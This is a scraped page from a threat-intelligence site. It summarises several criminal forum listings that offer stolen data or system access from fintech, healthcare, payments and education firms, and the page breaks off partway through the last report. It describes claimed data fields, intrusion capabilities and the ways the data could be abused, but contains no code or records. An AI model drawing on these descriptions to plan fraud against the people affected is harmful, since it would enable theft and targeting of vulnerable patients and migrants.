days](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1000/2026/08/30d.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1000/2026/08/30d.png) Website – Last 30 Days August 29, 2026 · Next update: September 29, 2026 // Contact ## Get in Touch Share your objectives, target audience, and timeline. I'll reply with options and availability. **Communication & Ethical Guidelines**Phone calls aren't supported. Please reach out via email or a secure messenger. No personal information will be shared. Responses are provided only to verified organizations that follow transparent and ethical cybersecurity practices. Company Name \* Company Website \* Business Email \* Use a company domain. What are you interested in? \* Select a package $700/month – Header Banner Ads $300/month – Footer Banner Ads Prices shown are starting rates. Final pricing depends on placement, inventory, and timing. Your Message \* Are you a paid subscriber? \* Select an option Yes No I agree to the [Terms of Service](https://darkwebinformer.com/terms-of-service), [Privacy Policy](https://darkwebinformer.com/privacy-policy), and the Guidelines. Send message → © 2026 Dark Web Informer · All rights reserved ### Development Board URL: https://darkwebinformer.com/development-board/ Last updated: 2025-09-04T21:44:27.000Z _This page is for subscribers on the Plus, Pro and Elite tiers only._ ## Posts ### FairMoney Dataset Claim Covers ~335,505 User Accounts URL: https://darkwebinformer.com/fairmoney-dataset-claim-covers-335-505-user-accounts/ Last updated: 2026-09-10T17:06:20.000Z Breach Report Nigeria Financial & Personal Data Free Download ## FairMoney Dataset Claim Covers \~335,505 User Accounts A forum actor posting as **GoreTerminal** has released what they claim is a filtered dataset belonging to **FairMoney**, a licensed digital bank in Nigeria that provides personal loans and mobile financial services. The actor states that the original dataset contained **around 7 million users**, but that the released file was filtered to records containing phone numbers and email addresses. The forum listing advertises approximately **335,505 user accounts**, including **330,000+ phone numbers and 143,000+ email addresses**, together with names, gender, location fields, customer and agent identifiers, device IMEI values, bank names, transaction references, transaction metadata and account or agent status fields. The dataset is offered as a **free download**. The claim is **unverified**. Severity CRITICAL [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) User accounts\~335,505 Phone numbers330K+ Email addresses143K+ Compressed37 MB ### ▣Post details TargetFairMoney CountryNigeria SectorDigital banking / fintech ListingFree database leak FormatJSON Lines File size242 MB raw / 37 MB compressed Claimed breach dateSep 10, 2026, 08:51 AM EDT ActorGoreTerminal ### !What the post claims - Approximately 335,505 user accounts - 330,000+ phone numbers - 143,000+ email addresses - Names and gender - Customer names, IDs and mobile numbers - User IDs - Device IMEI values - Bank names - LGA and state information - Agent usernames - Recruiter and sponsor IDs - Agent IDs and transaction IDs - Offline transaction IDs - Transaction references and narration - Account type and status fields - Agent type and status fields - Original source allegedly held around 7M users - Released file filtered for records with phones and emails - Dataset distributed as a free download ### ◱Screenshots [ ![Forum post claiming a FairMoney data breach and advertising approximately 335,505 user accounts, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/978436592873659872365698723597682395782.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/978436592873659872365698723597682395782.png) [ ![Forum post showing claimed FairMoney user fields, samples and free download listing, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/978436592873659872365698723597682395783.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/978436592873659872365698723597682395783.png) Forum post claiming a FairMoney dataset containing hundreds of thousands of user records, observed 10 September 2026. ### ☷Mapped techniques The actor does not describe how FairMoney was accessed or how the data was extracted. The technique below is inferred from the structured records shown in the listing, not stated by the actor. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from Information Repositories Inferred The released material is described as a structured JSONL dataset containing customer, agent, device and transaction-related fields, which is consistent with collection from an internal information repository or application database. ### ⚠Potential impact If authentic, the combination of **names, phone numbers, email addresses, location data, customer identifiers, device IMEI values and financial transaction metadata** could support highly targeted phishing, account impersonation, SIM-swap attempts and other forms of social engineering. Transaction references, bank names and account or agent metadata may also help attackers build convincing fraud narratives around legitimate financial activity. Because the dataset is being offered as a **free download**, the potential exposure is not limited to a single buyer and could spread rapidly across multiple criminal communities. ### iStatus Unverified The forum post includes a detailed field list, sample records, file sizes and a claimed breach timestamp. The actor states that a much larger source containing around **7 million users** was filtered down to records containing phone numbers and email addresses, while the thread title advertises approximately **335,505 accounts**. Dark Web Informer has **not independently verified the authenticity of the dataset, the claimed source population or the stated breach date**. No intrusion method is described in the post. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=fairmoney-2026-09-10&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=fairmoney-2026-09-10&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=fairmoney-2026-09-10&utm%5Fcontent=footer) // Threat Intelligence ### PT Betiri Cipta Media Core Database Access Offered for $25K URL: https://darkwebinformer.com/pt-betiri-cipta-media-core-database-access-offered-for-25k/ Last updated: 2026-09-10T16:02:49.000Z Access Sale Indonesia Financial Systems $25K XMR ## PT Betiri Cipta Media Core Database Access Offered for $25K A forum actor posting as **TheTrueWorldCreator** is offering what they claim is **full access to the core money database of PT Betiri Cipta Media**, an Indonesian aggregator and distributor of digital goods operating as a PPOB business. The post describes a B2B platform used by small resellers for **mobile airtime, prepaid electricity, e-wallet top-ups, bank transfers, games and vouchers, and utility bill payments**. The actor claims **direct database access with read and write permissions**, access to transaction and reseller tables, bank and deposit records, gateway credentials, an SMS gateway, the OtomaX management interface, an employee workstation and a corporate Telegram account. The asking price is **$25,000 in XMR**. The claim is **unverified**. Severity CRITICAL [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Price$25K Transactions / day14,301 Daily value\~$97.5K Resellers1.5K+ ### ▣Post details TargetPT Betiri Cipta Media CountryIndonesia SectorDigital goods / PPOB ListingFull database access Price$25,000 XMR PermissionsSELECT / INSERT / UPDATE / DELETE ObservedSep 9, 2026 ActorTheTrueWorldCreator ### !What the post claims - Full access to the core money database - Direct database IP and credentials - Full read and write permissions - Ability to alter reseller balances - Ability to create fake sales or refunds - Access to bank statement data - Ability to modify incoming deposit account details - Access to deposit ticket records - Gateway passwords and H2H infrastructure - OtomaX GUI access and credentials - Access to an employee workstation - Corporate Telegram account access - SMS gateway access - Bulk SMS capability to 1,723+ resellers and clients - 14,301 transactions on Sep 9, 2026 - 1,690,440,633 IDR in stated daily transaction value - \~$51K stated daily transaction flow elsewhere in the post - \~$3.6M stated bank turnover over roughly three weeks - Remote execution offered on employee systems - Trustee samples offered through a file-sharing link ### ◱Screenshots [ ![Forum post offering alleged access to PT Betiri Cipta Media financial systems, part one, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/12359782359768295786239875692876359872.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/12359782359768295786239875692876359872.png) [ ![Forum post offering alleged access to PT Betiri Cipta Media financial systems, part two, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/12359782359768295786239875692876359873.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/12359782359768295786239875692876359873.png) Forum post offering alleged access to PT Betiri Cipta Media's database and related financial infrastructure, observed 9 September 2026. ### ☷Mapped techniques The actor does not explain the initial intrusion method. The techniques below are mapped only to capabilities explicitly claimed in the listing. - Persistence / Defense Evasion [T1078](https://attack.mitre.org/techniques/T1078/) Valid Accounts Claimed The listing offers direct database credentials, OtomaX credentials and access to other authenticated internal services. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from Information Repositories Claimed The actor describes direct access to SQL Server tables containing reseller balances, transaction journals, bank statements, deposit tickets and other operational records. - Impact [T1565.001](https://attack.mitre.org/techniques/T1565/001/) Stored Data Manipulation Claimed The post explicitly describes modifying balances, falsifying sales and refunds, changing bank account details and creating deposit records for transfers that did not occur. ### ⚠Potential impact If the claimed access is authentic, the risk extends well beyond data exposure. The actor describes the ability to **change reseller balances, fabricate sales and refunds, alter bank account details used for incoming deposits and create deposit records**, which could enable direct financial theft or transaction manipulation. Access to the **SMS gateway and corporate messaging infrastructure** could also support targeted phishing, fraudulent payment notifications and impersonation of legitimate business communications. Claimed access to an employee workstation and an offer to execute arbitrary software would further increase the risk of **malware deployment, credential theft and expansion into additional internal systems**. ### iStatus Unverified The forum listing contains detailed descriptions of database tables, permissions, transaction volumes and internal infrastructure, together with samples presented as evidence. However, Dark Web Informer has **not independently verified the claimed access, transaction figures or the actor's ability to modify the environment**. The listing does not state how the initial access was obtained, when it began or whether the alleged access remains active. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=pt-betiri-cipta-media-2026-09-09&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=pt-betiri-cipta-media-2026-09-09&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=pt-betiri-cipta-media-2026-09-09&utm%5Fcontent=footer) // Threat Intelligence ### AdvaCare Dataset Claimed on Forum, 20,734 Timesheet Entries and 39 Staff Accounts URL: https://darkwebinformer.com/advacare-dataset-claimed-on-forum-20-734-timesheet-entries-and-39-staff-accounts/ Last updated: 2026-09-09T19:39:11.000Z Breach Report Switzerland Staff & Financial Data Database Dump ## AdvaCare Dataset Claimed on Forum, 20,734 Timesheet Entries and 39 Staff Accounts A forum actor posting as **DaOnlySpark** has published what they describe as a small dump of data belonging to **AdvaCare**, a Swiss healthcare consultancy focused on long-term care and nursing. According to the post, the dataset contains **20,734 timesheet entries, 4,683 tasks, 2,606 expense records, 732 projects and 39 staff accounts**. The actor claims the material includes **employee names, email addresses, hourly rates, billable hours by employee and task, expense amounts, tax and invoice references, project costs and internal cost centre information**. A visible staff sample is included in the post, while the download is hidden behind a forum reply requirement. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Timesheets20,734 Tasks4,683 Expenses2,606 Staff accounts39 ### ▣Post details TargetAdvaCare CountrySwitzerland SectorHealthcare consultancy ListingSmall database dump Projects732 DownloadReply required to reveal ObservedSep 9, 2026 ActorDaOnlySpark ### !What the post claims - 20,734 timesheet entries - 4,683 task records - 2,606 expense records - 732 projects - 39 staff accounts - Employee full names - Employee email addresses - Hourly rates - Billable hours by employee and task - Expense amounts - Tax references - Invoice references - Project costs - Internal cost centres - Staff sample published in the thread - Download hidden behind forum reply ### ◱Screenshot [ ![Cybercrime forum post claiming a database dump belonging to Swiss healthcare consultancy AdvaCare, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/8432587962359829637852938765978623.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/8432587962359829637852938765978623.png) Forum post claiming a database dump belonging to AdvaCare, observed 9 September 2026. ### ☷Mapped techniques The post does not describe how access was obtained or how the data left the environment. The entry below is inferred from the structure of the claimed dataset, not stated by the actor. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred The claimed material groups structured timesheet, task, expense, project and staff-account records, which is consistent with data collected from an internal business information repository or application database. ### ⚠Potential impact If authentic, the exposed staff information could support **targeted phishing, business email compromise and payroll or finance impersonation**, particularly because names and email addresses are paired with internal work and compensation details. The claimed **hourly rates, billable hours, expense amounts, invoice references, project costs and internal cost centres** could also reveal sensitive operational and financial information that may be useful for fraud or social engineering. The visible post describes staff, project, timesheet and expense data. **It does not claim patient or clinical records.** ### iStatus Unverified The forum post includes record counts and a structured staff sample, but it provides **no explanation of how the data was obtained**, when the alleged access occurred, or whether the underlying archive is complete. The download itself is hidden and requires a reply to the thread before it can be viewed. Dark Web Informer has **not independently verified the dataset or the claimed record counts**. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=advacare-2026-09-09&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=advacare-2026-09-09&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=advacare-2026-09-09&utm%5Fcontent=footer) // Threat Intelligence ### Blossom Health Records on 29,600 Mental Health Patients Offered for Sale URL: https://darkwebinformer.com/blossom-health-records-on-29-600-mental-health-patients-offered-for-sale/ Last updated: 2026-09-09T16:35:57.000Z Breach Report United States Mental Health Data Price By Offer ## Blossom Health Records on 29,600 Mental Health Patients Offered for Sale A forum actor posting as **2019** is selling what they describe as the patient database of **Blossom Health**, a virtual psychiatric care platform in the United States that provides online therapy and medication management for conditions including anxiety, depression, ADHD, autism, bipolar disorder and OCD. The listing covers **more than 29,600 patients** and the stated fields include **legal, preferred and middle names, date of birth, gender, phone number, email, full home address, the assigned provider and referring physician, first and last appointment dates, account status and tags**, together with a complete billing layer: **insurance payer, member, plan and group identifiers, copay amounts and policy subscriber details**. It is offered as a **one time sale** in cryptocurrency. The claim is **unverified**. Severity CRITICAL [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Patients29,600+ Insurance dataIncluded SaleOne time Actor2019 ### ▣Post details TargetBlossom Health CountryUnited States SectorVirtual psychiatric care ListingOne time sale, crypto Volume29,600+ patients Stated sourceNot described ObservedSep 9, 2026 Actor2019 ### !What the post claims - More than 29,600 patients - Legal and preferred names - Middle and last names - Dates of birth - Gender - Phone numbers and emails - Full home addresses - Assigned provider named - Referring physician - First appointment dates - Last appointment dates - Client since dates - Current status and tags - Billing type - Insurance payer identifiers - Insurance member identifiers - Plan and group identifiers - Copay amounts - Policy subscriber details - Subscriber address and birth date ### ◱Screenshot [ ![Forum listing selling patient records attributed to a US virtual psychiatric care platform, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/123789562793856987263596872369578987123.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/123789562793856987263596872369578987123.png) Forum post offering Blossom Health patient records for sale, observed 9 September 2026. ### ☷Mapped techniques The post describes no intrusion method. Both entries are inferred from the artefacts, not stated. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred Clinical scheduling fields and the insurance billing layer appear in one uniform row set, which points to an export from the practice management system rather than data assembled from several places. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred The sample is published inline and the sale is arranged through messaging services. The route out of the environment is not described. ### ⚠Potential impact With a psychiatric provider, **being in the file is itself the sensitive fact**. Membership discloses that a named person at a known address is in mental health treatment, which reaches employment, custody proceedings, insurance and immigration matters, and the provider, tag and appointment fields narrow the picture considerably further. The billing layer creates a second and separate harm: **insurance member, plan and group identifiers support medical identity theft and fraudulent claims**, a form of fraud victims usually discover only when a bill or a denial arrives. The population also deserves care in how this is reported, since some of these people are **currently unwell**, and extortion or exposure threats aimed at psychiatric patients carry obvious risk. ### iStatus Unverified The sample is **long and internally consistent**, with real insurer names, member identifier formats that match those carriers' conventions, and addresses whose city, state and postal code agree, which is difficult to fabricate across many rows. What is missing is **any account of how the data was obtained**, with no method, no date and no indication whether access has been closed. The account is **established with high standing**, and the one time sale framing limits circulation while implying a single buyer with a specific use. Dark Web Informer has **not retrieved the data and is not linking the contact addresses**, and Blossom Health has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=blossom-health-2026-09-09&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=blossom-health-2026-09-09&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=blossom-health-2026-09-09&utm%5Fcontent=footer) // Threat Intelligence ### 11.8 Million Transfast Payment SMS Records Offered With Portal Access URL: https://darkwebinformer.com/11-8-million-transfast-payment-sms-records-offered-with-portal-access/ Last updated: 2026-09-08T16:15:24.000Z Breach Report United States Payments Live Access Claimed ## 11.8 Million Transfast Payment SMS Records Offered With Portal Access A forum actor posting as **Marx** is advertising access to what they describe as a live database of messaging records belonging to **Transfast**, a cross border payment network acquired by Mastercard in 2019 and now operating as part of its transaction services business. The material is **not payment card data** but the **SMS delivery logs of a messaging portal** used to send transactional notifications, containing **recipients' phone numbers, transaction confirmations and money transfer details**. The dashboard shown reports **11,835,390 messages, all recorded as delivered, between January and early September 2026**. The actor offers a sample and links to the portal itself. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Messages11,835,390 PeriodJan to Sep 2026 AccessClient portal ActorMarx ### ▣Post details TargetTransfast ParentMastercard CountryUnited States SectorCross border payments ListingAccess and sample offered Volume11.8M messages Stated sourceMessaging portal ObservedSep 7, 2026 ### !What the post claims - 11,835,390 messages - All recorded as delivered - January to September 2026 - Database described as live - Recipient phone numbers - Transaction confirmations - Money transfer details - Message direction types - Account profile filtering - Delivery status counts - Traffic volume charts - Client portal access shared - Sample of 10,000 records - Payment network named - Parent company named - Contact by messenger - No price stated - No mechanism described ### ◱Screenshots [ ![Forum post advertising messaging records tied to a cross border payment network, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/19728359287365872356978623359871325987298375.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/19728359287365872356978623359871325987298375.png) [ ![Traffic chart shown in the same post alongside contact details, shown redacted](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/19728359287365872356978623359871325987298376.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/19728359287365872356978623359871325987298376.png) Forum post advertising Transfast messaging records, observed 7 September 2026. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Initial access [T1078](https://attack.mitre.org/techniques/T1078/) Valid accounts Inferred The proof is a signed in view of a messaging provider's customer portal with filters and reporting intact, which indicates account access rather than a database taken offline. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Stated Message logs covering eight months are queryable through the portal, and a sample has been extracted from them. - Credential access [T1111](https://attack.mitre.org/techniques/T1111/) Multi factor authentication interception Inferred Conditional and unconfirmed. Transactional messaging channels commonly carry one time codes as well as confirmations, and if any appear here then live portal visibility becomes a credential problem rather than only a privacy one. ### ⚠Potential impact Message logs from a payment network tie **a phone number to a confirmed transfer**, which produces a list of people who recently moved money and roughly when, and that is the working brief for remittance fraud. The affected population sharpens it, since cross border transfer customers are **frequently migrant workers sending money home**, a group already targeted heavily and often reachable in a second language. The unresolved question is whether the same channel carries **one time codes**; if it does, then **live visibility of delivered messages is an account takeover capability**, not a historical disclosure, and the urgency changes completely. ### iStatus Unverified Framing matters here more than usual: what is shown is **a messaging provider's portal serving the payment company**, and nothing in the post indicates a compromise of Mastercard's own payment systems. The dashboard is internally coherent, with delivery counts matching the traffic chart across the stated period, but **a screenshot demonstrates a session rather than access that persists**, and no acquisition route is given. The account is **days old with almost no standing**. Dark Web Informer has **not retrieved the sample, is not linking the portal or contact addresses**, and neither company has publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=transfast-2026-09-07&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=transfast-2026-09-07&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=transfast-2026-09-07&utm%5Fcontent=footer) // Threat Intelligence ### MSM Unify Extorted for 400,000 Dollars Over Student Passport and Visa Files URL: https://darkwebinformer.com/msm-unify-extorted-for-400-000-dollars-over-student-passport-and-visa-files/ Last updated: 2026-09-07T16:12:54.000Z Breach Report Canada Identity Documents Ransom Demanded ## MSM Unify Extorted for 400,000 Dollars Over Student Passport and Visa Files A forum actor posting as **Kazu** claims to hold **1.45 TB** taken from **MSM Unify**, a Canadian education technology platform that helps students apply to universities abroad. The listing gives **2,020,129 files covering 319,163 users** and describes the contents as applicant document packs: **passport copies, passport photographs, birth certificates, visas, refusal notices, school transcripts, English test score cards, offer letters and payment receipts**, alongside names, dates of birth, gender, marital status, citizenship, addresses, mobile numbers and passport numbers with expiry dates. This is **an extortion post rather than a sale**: the actor demands **400,000 dollars by 21 September** and threatens to sell the data otherwise. The claim is **unverified**. Severity CRITICAL [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Users319,163 Files2,020,129 Ransom$400,000 Deadline21 Sep 2026 ### ▣Post details TargetMSM Unify CountryCanada SectorEducation technology ListingExtortion, not for sale yet Volume1.45 TB, 2.02M files Dump dateStated as 2026 ObservedSep 7, 2026 ActorKazu ### !What the post claims - 1.45 TB of data - 2,020,129 files - 319,163 users - Passport copies - Passport numbers and expiry - Passport size photographs - Birth certificates - Visa documents - Refusal notices - School transcripts - English test score cards - Offer letters - Payment receipts - Names and dates of birth - Gender and marital status - Citizenship - Addresses and mailing addresses - Mobile numbers and emails - Ransom of 400,000 dollars - Deadline of 21 September - Sale threatened if unpaid - Samples offered privately ### ◱Screenshot [ ![Forum post demanding a ransom over student application documents attributed to a Canadian education platform, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/273895697286357892359876239876592873.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/273895697286357892359876239876592873.png) Forum post demanding payment over MSM Unify data, observed 7 September 2026. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred Structured applicant fields and document packs are described together, which spans an application system rather than a single store. - Collection [T1530](https://attack.mitre.org/techniques/T1530/) Data from cloud storage Inferred Two million files against three hundred thousand users indicates a document repository was taken in full, roughly six uploads per applicant. - Impact [T1657](https://attack.mitre.org/techniques/T1657/) Financial theft Stated A sum, a deadline and a consequence are all named, which makes this an active demand rather than a listing. ### ⚠Potential impact A passport copy, a birth certificate, a passport photograph and full personal details in one folder is **a complete identity kit per person**, assembled by the applicant themselves and impossible to reissue away. The population makes it worse: **international student applicants are already the target of immigration and admissions fraud**, and refusal notices and visa documents disclose exactly who has been rejected, which is the opening for approaches promising to fix an application for a fee. Notification will also be difficult, since these people are **spread across many countries and were applying rather than enrolled**, so the platform may have no current relationship with them at all. ### iStatus Unverified This is **a live negotiation conducted in public**, so the post is a pressure instrument first and a listing second, and its details are chosen to be persuasive to the victim rather than checkable by anyone else. **No sample appears in the thread**, only an offer to supply one privately, and no intrusion method or date is given beyond the year. The same actor listed another platform's data the previous week, so a pattern is forming. Dark Web Informer has **not retrieved the data and is not linking the samples or contact addresses**, and MSM Unify has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=msm-unify-2026-09-07&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=msm-unify-2026-09-07&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=msm-unify-2026-09-07&utm%5Fcontent=footer) // Threat Intelligence ### Jinko Patient Records Published With Diagnoses and Private Messages URL: https://darkwebinformer.com/jinko-patient-records-published-with-diagnoses-and-private-messages/ Last updated: 2026-09-07T15:50:05.000Z Breach Report France Patient Health Data Published Free ## Jinko Patient Records Published With Diagnoses and Private Messages A forum actor posting as **DaOnlySpark** has published **3.7 GB** attributed to **Jinko**, a French cancer care support platform. The release is described as **85 database tables holding 883,178 rows, plus a file archive of 2,626 items**. The patient side covers **3,552 accounts with email, name, phone, address and date of birth alongside a full clinical profile**: cancer type, disease stage, metastasis and location, recurrence, current and previous treatments, medications, surgical and family history, and socio economic fields. Also present are **free text nurse and practitioner notes, 20,635 private messages, quality of life questionnaires, symptom and weight tracking, and 142 named doctors with contact details**. The actor states **1,957 of the stored files are patient health documents**. The claim is **unverified**. Severity CRITICAL [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Patient accounts3,552 Rows883,178 Health files1,957 ActorDaOnlySpark ### ▣Post details TargetJinko CountryFrance SectorCancer care support ListingFree, reply to unlock Volume3.7 GB, 85 tables Stated sourceNot described ObservedSep 7, 2026 ActorDaOnlySpark ### !What the post claims - 3.7 GB across 85 tables - 883,178 rows total - 2,626 stored files - 1,957 patient health documents - 3,552 patient accounts - 188,023 change log entries - Names, emails and phones - Addresses and dates of birth - Cancer type and stage - Metastasis and location - Recurrence status - Current and past treatments - Medications and pathologies - Surgical and family history - Socio economic fields - Free text clinical notes - 20,635 private messages - Quality of life questionnaires - Symptom and weight tracking - 142 named doctors with contacts ### ◱Screenshots [ ![Forum post publishing patient records attributed to a French cancer care platform, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/82378952789562765827635876235876187.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/82378952789562765827635876235876187.png) [ ![Second section of the same post listing stored files and a clinician sample, shown redacted](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/82378952789562765827635876235876188.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/82378952789562765827635876235876188.png) Forum post publishing Jinko data, observed 7 September 2026. ### ☷Mapped techniques The post describes no intrusion method. All entries are inferred from the artefacts, not stated. - Initial access 